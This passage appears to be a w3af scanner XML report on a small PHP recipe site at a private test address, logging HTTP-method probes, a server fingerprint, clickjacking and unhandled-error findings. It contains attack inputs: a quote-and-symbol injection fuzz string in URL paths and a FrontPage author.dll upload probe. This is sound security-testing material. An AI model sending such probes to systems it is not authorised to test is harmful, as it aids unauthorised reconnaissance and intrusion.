                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="599">
                <http-request>
                    <status>PROPPATCH http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="624">
                <http-request>
                    <status>POST http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="0" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="635">
                <http-request>
                    <status>COPY http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="646">
                <http-request>
                    <status>TRACE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="669">
                <http-request>
                    <status>PATCH http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="696">
                <http-request>
                    <status>UNSUBSCRIBE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="715">
                <http-request>
                    <status>MKACTIVITY http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[1]" method="GET" name="Webserver fingerprint" plugin="hmap" severity="Information" url="None" var="None">
        <description>The most accurate fingerprint for this HTTP server is: &quot;JigSaw 2.2.2 (Solaris 8)&quot;.</description>
        <http-transactions>
            <http-transaction id="1">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[255, 285, 307]" method="GET" name="Unhandled error in web application" plugin="generic" severity="Low" url="http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29" var="token">
        <description>An unhandled error, which could potentially translate to a vulnerability, was found at: &quot;http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29&quot;, using HTTP method GET. The modified parameter was the URL filename, with value: &quot;d'kc&quot;z'gj'&quot;**5*(((;-*`)&quot;.</description>
        <long-description>Information Leakage is an application weakness where an application reveals sensitive data, such as technical details of the web application, environment, or user-specific data. Sensitive data may be used by an attacker to exploit the target web application, its hosting network, or its users. 

 In its most common form, information leakage is the result of one or more of the following conditions:
 * A failure to scrub out HTML/Script comments containing sensitive information
 * Improper application or server configurations
 * Improper application error handling
</long-description>
        <fix-guidance> * Ensure that the application source handles exceptions and errors in a such a way that no sensitive information is disclosed to the users
 * Configure the application server to handle and log any exceptions that the application might yield
</fix-guidance>
        <fix-effort>60</fix-effort>
        <references>
            <reference title="WASC threat classification" url="http://projects.webappsec.org/w/page/13246936/Information%20Leakage"/>
        </references>
        <http-transactions>
            <http-transaction id="255">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Chocolate cake&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;225g/8oz plain flour&lt;/li&gt;
        &lt;li&gt;350g/12½oz caster sugar&lt;/li&gt;
        &lt;li&gt;85g/3oz cocoa powder&lt;/li&gt;
        &lt;li&gt;1½ tsp baking powder&lt;/li&gt;
        &lt;li&gt;1½ tsp bicarbonate of soda&lt;/li&gt;
        &lt;li&gt;2 free-range eggs&lt;/li&gt;
        &lt;li&gt;250ml/9fl oz milk&lt;/li&gt;
        &lt;li&gt;125ml/4½fl oz vegetable oil&lt;/li&gt;
        &lt;li&gt;2 tsp vanilla extract&lt;/li&gt;
        &lt;li&gt;250ml/9fl oz boiling water&lt;/li&gt;
    &lt;/ul&gt;
    &lt;a href='/cake'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="285">
                <http-request>
                    <status>GET http://10.12.68.43:31337/Gm4UzWKx HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about Gm4UzWKx has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='Gm4UzWKx'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="307">
                <http-request>
                    <status>GET http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[255, 285, 365]" method="GET" name="Unhandled error in web application" plugin="generic" severity="Low" url="http://10.12.68.43:31337/" var="token">
        <description>An unhandled error, which could potentially translate to a vulnerability, was found at: &quot;http://10.12.68.43:31337/&quot;, using HTTP method GET. The modified parameter was the URL filename, with value: &quot;&quot;.</description>
        <long-description>Information Leakage is an application weakness where an application reveals sensitive data, such as technical details of the web application, environment, or user-specific data. Sensitive data may be used by an attacker to exploit the target web application, its hosting network, or its users. 

 In its most common form, information leakage is the result of one or more of the following conditions:
 * A failure to scrub out HTML/Script comments containing sensitive information
 * Improper application or server configurations
 * Improper application error handling
</long-description>
        <fix-guidance> * Ensure that the application source handles exceptions and errors in a such a way that no sensitive information is disclosed to the users
 * Configure the application server to handle and log any exceptions that the application might yield
</fix-guidance>
        <fix-effort>60</fix-effort>
        <references>
            <reference title="WASC threat classification" url="http://projects.webappsec.org/w/page/13246936/Information%20Leakage"/>
        </references>
        <http-transactions>
            <http-transaction id="255">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Chocolate cake&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;225g/8oz plain flour&lt;/li&gt;
        &lt;li&gt;350g/12½oz caster sugar&lt;/li&gt;
        &lt;li&gt;85g/3oz cocoa powder&lt;/li&gt;
        &lt;li&gt;1½ tsp baking powder&lt;/li&gt;
        &lt;li&gt;1½ tsp bicarbonate of soda&lt;/li&gt;
        &lt;li&gt;2 free-range eggs&lt;/li&gt;
        &lt;li&gt;250ml/9fl oz milk&lt;/li&gt;
        &lt;li&gt;125ml/4½fl oz vegetable oil&lt;/li&gt;
        &lt;li&gt;2 tsp vanilla extract&lt;/li&gt;
        &lt;li&gt;250ml/9fl oz boiling water&lt;/li&gt;
    &lt;/ul&gt;
    &lt;a href='/cake'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="285">
                <http-request>
                    <status>GET http://10.12.68.43:31337/Gm4UzWKx HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about Gm4UzWKx has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='Gm4UzWKx'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="365">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[18, 49, 101, 102, 107, 127, 132, 170, 204, 205, 206, 208, 209, 210, 213, 215, 216, 217, 218, 219, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 234, 235, 236, 237, 238, 239, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 257, 262, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 280, 281, 282, 283, 285, 291, 307, 312, 317, 318, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 336, 340, 344, 346, 347, 348, 349, 350, 351, 352, 353, 354, 355, 356, 358, 359, 360, 361, 362, 363, 367, 369, 370, 371, 373, 375, 376, 380, 392, 393, 409, 411, 425, 428, 431, 432, 433, 434, 435, 436, 437, 439, 440, 444, 445, 447, 448, 449, 450, 451, 453, 455, 456, 458, 460, 463, 464, 465, 466, 467, 469, 477, 478, 495, 509, 514, 519, 523, 524, 526, 528, 529, 530, 532, 533, 534, 536, 540, 542, 556, 570, 582, 590, 595, 602, 612, 623, 655, 658, 672, 675, 690, 691, 693, 703, 708, 714, 721, 722, 728, 732, 736, 737, 739, 748, 752, 755, 757, 758, 761, 769, 770, 774, 776, 785, 792, 800, 809, 817, 824, 833, 839, 852, 855, 867]" method="GET" name="Click-Jacking vulnerability" plugin="click_jacking" severity="Medium" url="None" var="None">
        <description>The whole target has no protection (X-Frame-Options header) against Click-Jacking attacks.</description>
        <long-description>Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.

The server didn't return an `X-Frame-Options` header which means that this website could be at risk of a clickjacking attack. The `X-Frame-Options` HTTP response header can be used to indicate whether or not a browser should be allowed to render a page inside a frame or iframe. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.</long-description>
        <fix-guidance>Configure your web server to include an X-Frame-Options header.</fix-guidance>
        <fix-effort>50</fix-effort>
        <references>
            <reference title="RFC-7034" url="http://tools.ietf.org/html/rfc7034"/>
            <reference title="Mozilla developer network" url="https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Options"/>
            <reference title="OWASP Clickjacking document" url="https://www.owasp.org/index.php/Clickjacking"/>
        </references>
        <http-transactions>
            <http-transaction id="18">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="49">
                <http-request>
                    <status>PUT http://10.12.68.43:31337/hzaBe HTTP/1.1</status>
                    <headers>
                        <header content="6" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="text/plain" field="Content-type"/>
                    </headers>
                    <body content-encoding="text">MTgVQi</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about hzaBe has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='hzaBe'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="101">
                <http-request>
                    <status>GET http://10.12.68.43:31337/favicon.ico HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/favicon.ico&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="102">
                <http-request>
                    <status>GET http://10.12.68.43:31337/_vti_inf.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_inf.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="107">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ulpjm.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/ulpjm.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="127">
                <http-request>
                    <status>GET http://10.12.68.43:31337/server-status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about server-status has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='server-status'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="132">
                <http-request>
                    <status>POST http://10.12.68.43:31337/_vti_bin/_vti_aut/author.dll HTTP/1.1</status>
                    <headers>
                        <header content="158" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWV0aG9kPXB1dCBkb2N1bWVudDo0LjAuMi40NzE1JnNlcnZpY2VfbmFtZT0mZG9jdW1lbnQ9W2Rv
Y3VtZW50X25hbWU9L3VscGptLmh0bWw7bWV0YV9pbmZvPVtdXSZwdXRfb3B0aW9uPW92ZXJ3cml0
ZSZjb21tZW50PSZrZWVwX2NoZWNrZWRfb3V0PWZhbHNlCmxtdGgubWpwbHU=
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_bin/_vti_aut/author.dll&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="170">
                <http-request>
                    <status>GET http://10.12.68.43:31337/robots.txt HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
